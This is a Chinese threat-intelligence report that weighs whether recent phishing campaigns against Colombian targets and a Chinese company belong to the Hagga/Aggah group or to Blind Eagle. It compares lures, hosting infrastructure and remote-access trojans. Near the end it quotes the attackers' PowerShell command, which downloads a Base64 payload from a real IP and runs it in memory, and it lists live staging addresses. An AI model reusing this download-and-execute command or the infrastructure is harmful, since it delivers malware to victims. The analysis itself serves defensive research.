Hagga是一个以信息窃取为动机的威胁组织,2019年3月首次被Unit 42的研究人员公开披露
[1]
。研究人员最初认为该活动是针对中东国家内部组织进行的攻击活动。进一步研究表明,这项活动可能是规模更大活动的一部分,该活动不仅影响中东地区,而且影响美国以及整个欧洲和亚洲,Unit 42将其称为Aggah活动。早期的攻击活动当木马向C2服务器发送数据时,会使用字符串“hagga”分割信息,并且该字符串与活动中托管有效负载信息的PasteBin帐户同名,由此该活动被命名为Aggah。后来国外安全研究人员披露的文章以Hagga/Aggah来指代该组织,下文描述中我们将采用Hagga这一名称。
Unit 42最开始认为,由于TTP相似性以及使用Revenge RAT,Hagga与Gorgon Group存在关联。Gorgon Group是一个以西方政府为目标而闻名的巴基斯坦组织。然而,在那次调查中没有观察到突出的Gorgon Group指标,因此Unit 42无法正式将Hagga与Gorgon Group联系起来。
Hagga自2019年以来一直活跃,最早可追溯至2018年,并通常在攻击活动中使用相同的TTP,早期攻击活动该组织曾使用Internet Archive、Pastebin和Blogspot来托管恶意脚本和有效载荷,通常是RevengeRAT,后续陆续观察到的RAT包括有LimeRAT、NjRAT、AsyncRAT、NanoCoreRAT、RemcosRAT、Agent Tesla等。
下图是Hagga组织历年来被公开披露的活动事件。
盲眼鹰(奇安信内部组织编号APT-Q-98)是奇安信独立发现并率先披露的APT组织。盲眼鹰组织是一个疑似来自南美洲的、主要针对哥伦比亚的APT组织,该组织自2018年4月起至今,针对哥伦比亚政府机构和大型公司(金融、石油、制造等行业)等重要领域展开了有组织、有计划、针对性的长期不间断攻击。
早期盲眼鹰组织的TTP是通过入侵西班牙语网站或者注册有隐私保护的域名并上传用于攻击的载荷文件和文档,将带有恶意宏的MHTML格式的Office Word诱饵文档通过RAR加密后配合鱼叉邮件对目标进行投递,然后将RAR解压密码附带在邮件正文中,具有很好的躲避邮件网关查杀的效果。盲眼鹰组织常伪装成哥伦比亚国家民事登记处、哥伦比亚国家税务和海关总署、哥伦比亚国家统计局、哥伦比亚国家网络警察局、哥伦比亚国家司法部门,对哥伦比亚的政府、金融机构,本国大型企业或跨国公司的哥伦比亚分公司进行攻击,使用商业木马对目标进行远程控制,并采用了基于动态域名的远程控制技术,其最终目的是植入后门以实现对目标计算机的控制,为接下来的横向移动提供基础。
一直以来,Hagga组织与盲眼鹰组织被当成两个独立的组织进行追踪,但是Hagga组织与盲眼鹰组织的TTP保持有一定的相似性,并且两者最终载荷多为商业木马或者开源木马,导致难以对两者从TTP上进行区分。现阶段暂时没有强有力的证据证明Hagga组织与盲眼鹰组织的关系,但国外有安全研究员猜测Hagga组织可能会出售自己的黑客服务
[2]
。
奇安信威胁情报中心红雨滴团队一直以来都在对全球各大APT组织进行追踪,在对南美洲相关APT组织盲眼鹰(APT-Q-98)进行追踪时我们发现,自2022年至今,从哥伦比亚上传了上百个诱饵pdf文件,这些诱饵pdf大多通过电子邮件进行传播,这些诱饵常伪装成哥伦比亚的相关机构,包括哥伦比亚司法部门、税务和海关总局、哥伦比亚银行Davivienda、财务部、交通部、律师事务所等。这些pdf文件在正文中嵌入了压缩包密码,并诱导受害者点击短链接下载压缩包,解压后点击执行伪装为pdf的VBS脚本,从而开启一个复杂的多阶段无文件感染链,最终加载远控软件。
初始攻击诱饵邮件的语言为西班牙语。
伪装成哥伦比亚SIMIT综合信息处理系统交通事故的罚款和处罚通知。
伪装成哥伦比亚银行Davivienda发布的禁运通知。
伪装成哥伦比亚财务部、税务和海关总署对个人所得税问题的通知。
最开始的时候,我们调查了大量的诱饵文件,由于其TTP与盲眼鹰几乎保持一致,其诱饵文件使用西班牙语编写,并且都从哥伦比亚上传,这一切都符合盲眼鹰的攻击目标和技术特征,我们便将这些攻击活动归属到了盲眼鹰组织。
后续在对这些文件进行分析时,我们发现其中有个IP地址172.174.176.153有个开放目录被用来存放后续载荷,这与国外友商BlackBerry在披露盲眼鹰活动中的博客相一致
[3]
。然而在一段时间之后,这个IP的开放目录的托管内容更新了,这引起了我们的注意。
在对新的载荷进行分析后,我们发现其仍然是盲眼鹰组织常用的C#注入器。然而当天我们看到与该IP有关的一个新的钓鱼邮件,根据内容疑似是对中国某企业进行鱼叉攻击。不过不论是邮件内容,还是诱饵附件内容的契合度,看起来都相当的粗糙,以至于更像是源自普通黑客团伙,而不像专业的APT组织。
回顾盲眼鹰自披露以来的攻击活动,我们并没有发现其有攻击过中国的例子。但这封攻击邮件的到来,使我们不得不重新审视曾经归属于盲眼鹰的攻击活动背后的组织。
早在2019年我们公开披露盲眼鹰的攻击活动时,就曾在博客中公开了盲眼鹰的TTP
[4]
。
下图是友商在2022年披露的盲眼鹰攻击流程图
[5]
。
我们将此次Hagga组织攻击活动的攻击链用以下流程图进行表示。
可以看到的是,此次攻击活动从TTP上来看与盲眼鹰以往的TTP大体保持一致,不仅改良了部分活动的细节,还扩展了初始攻击的诱饵文档,包括携带漏洞的office文档,免杀效果极好的诱饵pdf文档等,区别在于最终加载的RAT有所变化。
通过上面的对比可以看到,我们没法把盲眼鹰组织与Hagga组织从TTP上区分开来,我们试图通过下面的一些细节来进行归属。
(1) 攻击目标
已知的盲眼鹰组织主要攻击位于哥伦比亚境内,以及南美的一些地区,如厄瓜多尔、巴拿马、智利等。而已知的Hagga组织攻击目标包括中东、欧洲、亚洲、美洲等地区的国家。虽然捕获的样本大部分来自哥伦比亚地区,但由于捕获到了针对中国企业的攻击样本,加上Hagga组织先前有攻击中国台湾的先例
[6]
,所以我们更倾向于是Hagga组织。
(2) 托管恶意载荷IP的一些相似性
托管恶意载荷的IP:172.174.176.153与友商披露Hagga组织托管的恶意载荷有相同目录结构和名称后缀
[7]
。
2022年国外友商披露Hagga组织似乎正在使用XAMPP作为Web服务器,在Windows虚拟服务器上托管Mana Tools C2面板
[8]
。而其托管恶意载荷的IP:172.174.176.153同样在使用XAMPP,并且同样使用了3306端口(MySQL服务器的默认端口)。
(3) 鱼叉邮件使用的语言以及发件地址
盲眼鹰组织主要使用西班牙语制作诱饵进行攻击,而此次鱼叉邮件使用的是英语。另外捕获邮件的实际发件域名为slot0.cedarstz.top,该域名解析到IP:185.28.39.60,该IP被我们标记成了僵尸网络。早在2020年,国外友商就曾发文描述Hagga组织如何在不租用服务器的情况下运行僵尸网络
[9]
。
(4) 使用的商业木马
目前看到Hagga组织使用的商业木马或开源木马包括RevengeRAT、LimeRAT、NjRAT、AsyncRAT、NanoCoreRAT、WarzoneRAT、RemcosRAT、Agent Tesla等,而盲眼鹰组织目前看到使用的木马包括LimeRAT、NjRAT、AsyncRAT、Imminent Monitor RAT、QuasarRAT等。从现有的报告来看,Hagga组织使用的木马集合是大于盲眼鹰组织的,也就是说Hagga组织的活动范围、频率这些都较盲眼鹰组织更广阔一些。
(1) 可能一:Hagga组织是盲眼鹰组织的子组?
从TTP上来看,两者太相似了。在针对哥伦比亚进行鱼叉式钓鱼攻击是均使用西班牙语;均从公共存储库下载有效载荷;C2均是动态域名;均使用公开的商业木马来作为最终载荷;均以窃取信息为目标。
虽然没有强有力的证据证明Hagga组织与盲眼鹰组织两者的关系,但我们猜想或许Hagga组织与盲眼鹰组织为互补关系,一个主要对哥伦比亚展开攻击,另外一个建立僵尸网络,对全球一些主要国家都感兴趣。
(2) 可能二:Hagga组织向盲眼鹰组织提供网络武器?
2020年,Hagga组织不仅针对欧洲展开攻击,还被安全研究员发现Hagga组织开始开展比特币窃取活动,在最新的活动中,攻击者选择冒充欧洲、中东和亚洲的B2B公司,这表明他们的攻击目标并不局限于特定地区。受害者的部门和位置还表明,攻击者试图破坏从制造业到农业等各个行业的企业。
此外,在medium平台上,Paul Burbage指出,Hagga组织向尼日利亚威胁行为者出售或免费提供恶意软件,这与他们发现的数据相吻合
[10]
。这表明Hagga组织同样有可能向盲眼鹰组织出售其TTP和恶意软件。
(3) 可能三:模仿TTP?
纵观整个攻击链,无论是托管的平台,还是VBS、Powershell、C#代码,这对逆向工程师来说,相当于开源代码,可直接复制后调试使用,不能排除有模仿TTP的可能。
上述鱼叉邮件中的附件INV20230503.xlsx是携带CVE-2017-11882漏洞的文档,通过漏洞访问109.206.240.64挂载的GEE.vbs,然后在%appdata%目录下释放KJH.vbs并执行,KJH.vbs最终调用powershell向172.174.176.153请求new_rump_vb.net.txt来执行。
其中109.206.240.64挂载的GEE.vbs内嵌大量无害甚至开源的代码,真正的恶意代码隐藏在其中,并且仅占用几行。
这段VBS代码的功能是调用PowerShell来执行以下代码:
powershell.exe [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://172.174.176.153/dll/new_rump_vb.net.txt'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('04*●*☞#:▶ITS!}(ú░}(úø(@@*ú4*●*☞#:▶4}�ø▶4*●*☞#:▶∞*▲◀(∞*▲◀(.∞*▲◀(ø☀☞√�}П�sap4*●*☞#:▶4*●*☞#:▶▶☟ð}↓→+◀spø☀☞√�}П�ø☀☞√�}П�↓*(▲☟@*⇝','1','2No3me_3tartup'))
挂载在172.174.176.153下的new_rump_vb.net.txt使用Base64进行编码,并使用Eziriz .NET Reactor进行壳保护。
PowerShell脚本调用VAI函数,在函数内部首先替换字符串,下载后阶段载荷。其中替换的字符串较为固定,在我们追踪的过程中,较长时间都未曾更换,为此我们复制其代码专门创建了一个字符串替换函数。
向https://paste.ee/d/2cSTI/0下载后续载荷,最终创建傀儡进程运行。
值得一提的是,自5月1日new_rump_vb.net.txt上传以来,短短半个月,已知的就已经出现了66个与之相关的恶意文档,包括xlsx、RTF格式的诱饵文档,RAR、VBS格式的执行文档,甚至还有HTML页面。
通过追踪发现,以及对开源报告的梳理,我们觉得盲眼鹰与Hagga组织TTP过于相似,或许它俩混杂在一起,令人难以区分开来。在没有确凿证据的前提下,我们提出了一些猜想,希望在后续的威胁狩猎过程中可以发现更多线索来佐证猜想。鉴于APT组织攻击的复杂性,以及Hagga组织对全球主要国家的无差别攻击,奇安信威胁情报中心会对其进行长期的溯源和跟进,及时发现安全威胁并快速响应处置。
